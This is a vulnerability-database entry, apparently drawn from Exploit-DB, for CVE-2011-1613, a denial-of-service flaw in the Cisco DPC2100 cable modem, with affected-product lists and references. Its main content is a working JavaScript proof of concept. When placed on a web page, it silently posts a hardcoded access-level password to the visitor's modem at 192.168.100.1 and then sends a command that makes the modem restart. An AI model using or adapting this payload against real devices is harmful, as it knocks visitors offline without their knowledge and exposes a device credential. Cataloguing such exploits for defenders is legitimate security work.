ID
VAR-E-201104-0199
CVE
cve_id: | CVE-2011-1613 | Trust: 2.4 |
EDB ID
21523
TITLE
Cisco DPC2100 - Denial of Service - Hardware dos Exploit
Trust: 0.6
DESCRIPTION
Cisco DPC2100 - Denial of Service. CVE-2011-1613, CVE-72616. DoS exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | cisco | model: | dpc2100 | scope: | - | version: | - | Trust: 2.1 |
vendor: | cisco | model: | wlc526 mobility express controller | scope: | eq | version: | 0 | Trust: 0.3 |
vendor: | cisco | model: | wlc modules for integrated services routers | scope: | eq | version: | 0 | Trust: 0.3 |
vendor: | cisco | model: | wireless lan control | scope: | eq | version: | 6.0.182.0 | Trust: 0.3 |
vendor: | cisco | model: | wireless lan control | scope: | eq | version: | 7.0 | Trust: 0.3 |
vendor: | cisco | model: | wireless lan control | scope: | eq | version: | 6.0.199.0 | Trust: 0.3 |
vendor: | cisco | model: | wireless lan control | scope: | eq | version: | 6.0.196.0 | Trust: 0.3 |
vendor: | cisco | model: | wireless lan control | scope: | eq | version: | 6.0.188.0 | Trust: 0.3 |
vendor: | cisco | model: | wireless lan control | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | cisco | model: | wireless lan controller | scope: | eq | version: | 21000 | Trust: 0.3 |
vendor: | cisco | model: | wireless lan control | scope: | ne | version: | 7.0.98.216 | Trust: 0.3 |
vendor: | cisco | model: | wireless lan control | scope: | ne | version: | 7.0.112.0 | Trust: 0.3 |
vendor: | cisco | model: | wireless lan control | scope: | ne | version: | 6.0.200.0 | Trust: 0.3 |
EXPLOIT
# Exploit Title: Cisco DPC2100 Denial of Service
# Date: 09/01/2010
# Author: Daniel Smith
# Software Link: http://www.cisco.com/
# Version: HW:2.1/SW:v2.0.2r1256-060303
# Tested on: OSX 10.6/Win7
# CVE: CVE-2011-1613
=======================================================
Information
=======================================================
Executing this script on page load will cause the user's modem to restart when
they visit the page. This example uses JavaScript but can just as easily be written
in another language to accomplish something similar. The attack consists of
two parts.
Part 1 - Privilege Escalation:
POST: http://192.168.100.1/goform/_aslvl
PARAMS: SAAccessLevel=2&SAPassword=W2402
Part 2 - Modem Restart:
POST: http://192.168.100.1/goform/gscan
PARAMS: SADownStartingFrequency=705000000
=======================================================
Proof of Concept (Javascript)
=======================================================
(function() {
    var b=document.getElementsByTagName('body')[0];
    var otherlib=false;
    if(typeof jQuery!='undefined') {
        console.log('This page already using jQuery v'+jQuery.fn.jquery);
    } else if (typeof $=='function') {
        otherlib=true;
    }
    function getScript(url,success){
        var script=document.createElement('script');
        script.src=url;
        var head=document.getElementsByTagName('head')[0],
            done=false;
        // Attach handlers for all browsers
        script.onload=script.onreadystatechange = function(){
            if ( !done && (!this.readyState
                || this.readyState == 'loaded'
                || this.readyState == 'complete') ) {
                done=true;
                success();
                script.onload = script.onreadystatechange = null;
                head.removeChild(script);
            }
        };
        head.appendChild(script);
    }
    getScript('http://code.jquery.com/jquery-latest.min.js',function() {
        if (typeof jQuery=='undefined') {
            console.log('Sorry, but jQuery wasn\'t able to load');
        } else {
            console.log('This page is now jQuerified with v' + jQuery.fn.jquery);
            $.post("http://192.168.100.1/goform/_aslvl", { SAAccessLevel: "2", SAPassword: "W2402" } );
            console.log('Privilege Escalation: temporarily setting SAAccessLevel to \'2\'.');
            $.post("http://192.168.100.1/goform/gscan", { SADownStartingFrequency: "705000000" } );
            console.log('Reboot command sent.');
        }
    });
})();
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Denial of Service
Trust: 1.6
TAGS
tag: | exploit | Trust: 0.5 |
tag: | denial of service | Trust: 0.5 |
CREDITS
Daniel Smith
Trust: 0.6
EXTERNAL IDS
db: | NVD | id: | CVE-2011-1613 | Trust: 2.4 |
db: | EXPLOIT-DB | id: | 21523 | Trust: 1.6 |
db: | EDBNET | id: | 43611 | Trust: 0.6 |
db: | PACKETSTORM | id: | 116898 | Trust: 0.5 |
db: | BID | id: | 47606 | Trust: 0.3 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2011-1613 | Trust: 2.1 |
url: | https://www.exploit-db.com/exploits/21523/ | Trust: 0.6 |
url: | http://www.cisco.com/ | Trust: 0.3 |
url: | http://www.cisco.com/en/us/products/products_security_advisory09186a0080b7950e.shtml | Trust: 0.3 |
SOURCES
db: | BID | id: | 47606 |
db: | PACKETSTORM | id: | 116898 |
db: | EXPLOIT-DB | id: | 21523 |
db: | EDBNET | id: | 43611 |
LAST UPDATE DATE
2022-07-27T09:56:59.218000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 47606 | date: | 2012-09-26T14:50:00 |
SOURCES RELEASE DATE
db: | BID | id: | 47606 | date: | 2011-04-27T00:00:00 |
db: | PACKETSTORM | id: | 116898 | date: | 2012-09-26T23:48:28 |
db: | EXPLOIT-DB | id: | 21523 | date: | 2012-09-26T00:00:00 |
db: | EDBNET | id: | 43611 | date: | 2012-09-26T00:00:00 |